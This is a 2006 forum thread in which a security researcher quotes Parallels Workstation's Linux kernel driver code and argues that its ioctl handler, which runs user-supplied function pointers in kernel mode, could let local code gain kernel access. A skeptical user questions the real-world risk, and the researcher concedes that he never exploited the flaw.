Security & Design

Discussion in 'General Questions' started by jaaron, Jun 19, 2006.

  1. jaaron

    jaaron Bit poster

    Messages:
    2
    Several months ago, when Parallels Desktop for Mac was first covered on MacSlash, I posted a warning about the techniques used by Parallels in their Linux client.
    I had conducted a cursory glance over the code in the main driver module distributed with the Linux version of Parallels Workstation and been dismayed to find :

    Extracted from parallels-2.1.1670-lin/data/drivers/drv_main/ioctl s.c

    <snip>
    if (copy_from_user(&mFunc, arg, sizeof(struct monitor_functions_def_t) * MONFUNC_COUNT))
    break;

    /* setup functions pointers */
    for (i = 0; i < MONFUNC_COUNT; i++)
    param->iData.Moni torFuncs = (monitor_funct_t)mFunc.fId;

    /* initialize callbacks */
    vmSetExports(param);

    /* Monitor open */
    if (param->iData.MonitorFuncs[MONFUNC_OPEN]) {
    ret = param->iData.MonitorFuncs[MONFUNC_OPEN](&param- >drvInfo, 0, param);
    }

    </snip>

    This is part of the ioctl() system call handler for a device created by the drv_main module installed by Parallels workstation.

    Basically, it copies some function pointers in to the kernel from user space, installs them as event handlers (for what I'm not entirely sure), then calls one of them, while running in kernel mode! And it presumably calls the others at some point.

    This means that any process that is able to make this system call on the device in question is able to introduce its own arbitrary code into your kernel. This may or may not even require administrative priveleges. Surreptitiously introducing code into the kernel is generally referred to as a rootkit. There are some protections on this; specifically the caller must be able to produce a special "salt" (like a really long password of random characters) that was generated when the module was loaded (this is an optional protection that can be easily turned off by the user). But if someone does figure out this salt (or it is disabled), they will have complete, unbridled access to literally everything on your computer (e.g., you're bank account number as you type it into your online banking website), and they will be able to alter the way in which the operating system does things like interpret the filesystem (e.g., if they don't want you to see the file "Evil Hacker Toolbox of Doom" you won't, even if you're an administrator). Really, subverting the ability to introduce random code into the most trusted component of a system is the ultimate ability.

    Although I have only looked at part of their Linux version and none of their OS X version, my understanding of their design is that they're "hypervisor" straddles the divide between your operating system kernel, and the user space of your kernel by passing function references from a user land process to their modules. This design realizes none of the stability or security enhancing properties of the true hypervisor design because it shares an execution context with the primary OS kernel (it may take advantage of the speed benefits), and I believe it to be inherently insecure because it provides an easily exploitable mechanism by which arbitrary code can be run in a highly trusted execution environment. This is why I do not trust Parallels Workstation/Desktop.

    The Mac OS X has thus far been relatively resistant to threats. This is partly due to its relative obscurity, but is also the result of a reasonable privilege model (I refuse to get sucked into the debate over which is more relevant; both are important). Long time Mac users remember the days before OS X when there was no hard separation between user space and kernel space; it was a dangerous time it which a single misbehaving application could wreak havoc across your whole platform. I don't want to go back to that time, but if I'm right about how Parallels' produce works, that is exactly where they are taking us.

    If I am wrong about my interpretation of Parallels' design I urge someone more familiar with the inner workings of the software to set me straight. Because Parallels' software is mostly closed source, I believe the only people who are likely to be qualified to correct me are engineers working for Parallels, however anyone is welcome to try to dissuade me. I would also just like to take the chance to urge Parallels to provide full source code to their product so that others in the community are able to either verify my suspicions, or to disprove them (or maybe even verify that the problems exist, and correct them).

    -jaaron
     
  2. tgrogan

    tgrogan Pro

    Messages:
    255
    I have followed your previous discussions on this subject, and am having difficulty understanding its relevance to any real world situations. I am particularly baffeled by your projection from Open Source to OSX. If you can only construct a small possibility for the installation of a rootkit on a system where the code is open, what is the possibility on a very closed system like OSX? There is a vast difference between the bad old days when applications could misbehave and destroy operating systems causing inconvenience, and, the possibility for a rootkit to be installed on an end user machine by exploiting something obscure as you describe on the .0001% of all computers that happen to be running OSX or Linux and Parallels.

    I understand the need for close to perfection in security for server type applications, but projecting that detailed level of concern to end user computers is not justified. Most end user intrusion problems will always be the fault of the user doing something ill advised - and no built-in securty will ever prevent that.

    Please give us some slow talk about the reality of what you are focused on. I think talking of stolen bank transactions is more than a little over the edge considering the statements you made above it about how tedious the path is to exploit your conjectured breach.

    How about:
    1. Could any OS running in a Parallels VM use this volunerability?
    2. What enablers would there have to be for this to be exploited?
    3. Have you been able to exploit this?
    4. Have you ever heard of an Mac or Linux distro provided application that could install this specific root kit?
    5. Is it bad code or just a necessary evil for doing virtualization?
    6. Are there many other software products that do this same thing?
     
    Last edited: Jun 19, 2006
  3. jaaron

    jaaron Bit poster

    Messages:
    2
    Response

    Yarg, I just typed up a really long response by my session timed out. I will try to recapture it.

    You raise several good points. I will try to address what I feel they are.

    Yes it is a leap, but I feel a reasonable one. I am basing my assertions on the belief that Parallels has attempted to maximize code reuse using code isolation techniques. Specifically, I believe their kernel modules hold the bulk of the OS specific code, and present a consistent interface to the user space applications. This way, the user level code has to worry only about the underlying hardware (all x86), management logic (OS independent), and User Interface (typically OS dependent but very high level and fairly simple, on OS X it's mostly drag & drop).
    I have no real evidence for this, but it makes sense from a design perspective. My gripe is that I feel the interface exposed by their module opens the door to abuse.

    This is two points:
    1) Rootkits aren't as bad as no protected memory.
    2) It is unlikely that someone will be running Mac OS X + Parallels + Malicious Code

    With regards to point 1:
    That is true, but not as true as you think. Because OS X (and Linux, and Windows) use monolithic kernels (in the sense that the entire kernel operates in a single address space), malicious code running inside your kernel has full access to every single bit of memory and IO Port on the system. I noticed from your later comment about bank statements that you must have read my livejournal post on the subject, so I will not go in to great detail on the ring architecture.
    The thing to recall is that anything running in Ring 0 (kernel space) can do whatever it wants, the standard Unix permissions and access controls do not apply to kernel code.

    With regards to point 2:
    Also true, but I would say it is not an excuse. We (consumers) should not tolerate poor security engineering in software. We have put up with it for far to long and it has gotten us in no end of trouble. I could throw out all sorts of metaphors here about how I like locks on the doors to my home even though it is unlikely I will be robbed, but I'll spare you that refrain. My point is, security vulnerabilities, even ones that are unlikely to be exploited, hurt the consumer because they reinforce the message that software developers don't need to worry about preventing them. The only way to mitigate this problem is to expose the vulnerabilities so that individuals can do their own risk analysis and decide if they are willing to accept the risk involved in running a particular piece of insecure software. In my ideal world, enough people would be unwilling to accept this risk that it would force developers to fix the vulnerabilities, but I recognize that as a fantasy. I feel that as an informed citizen of the community (I work as a security researcher) I owe it to the community to do something about my findings (either post publicly or disclose to the developer privately). I chose to post publicly (for no particularly good reason other than because it's what I felt like doing).

    See above.

    Another good point. I was using a bit of hyperbole here. I admit it, I was fear mongering. I do not think it is likely that people's bank account information will be stolen through this method. There are much easier ways to do that (the best being to ask them for it, you'd be surprised how often that works). I made that comment to provide a concrete example of what bad things could be done if this were exploited. I felt that stolen bank account numbers were easier to grasp for a less technical audience than "arbitrary code running in ring 0" or any other technical gobledy-gook I may spit out. I also attempted to make it clear that this is a nontrivial thing to exploit. Obviously a risk analysis of the software involves comparing the likelihood of exploit to the cost of exploit, for most users the likelihood is phenomenally low and the potential cost is fairly low as well, so it may be a low enough risk that many people still choose to use the product, at least they have made an informed decision.

    Also, I would like to baselessly point out that to me this sort of vulnerability is indicative of an engineering process that does not put sufficient emphasis on security. This suggests that other vulnerabilities are likely to be lurking below my surface deep examination. Believe me, there is a community of malicious hackers who are phenomenally clever, and devoted to finding new and exciting ways to exploit software products. My cursory examination is nothing compared to the level of detail at which they may study this produce if it were to rise to prominence.

    1) I do not believe so. This is a (potential) vulnerability introduced into the host operating system, not the guest.
    2) The Parallels kernel module must be loaded (presumably done at boot time), if the salt is enabled the exploit code must determine it, other than that, nothing. I do not believe it would even require admin privileges (unless the Parallels userland app requires admin privs, and that would be a whole 'nother kettle of fish).
    3) No, I haven't even really succeeded in running parallels. I do not have access to an intel mac. I tried to run the software on linux, but had some problems with module versioning. I have not really tried to.
    4) I'm not entirely sure what you mean by this. Parallels product itself is not a rootkit (although some may disagree), it merely (I think) opens up a new avenue by which other code may install a rootkit.
    5) I don't think so. I looked at VMWare's linux kernel modules and they do not seem to import function pointers from userland into kernel space.
    6) I have not seen any.


    I hope this has clearly and sufficiently addressed your concerns.
     

Share This Page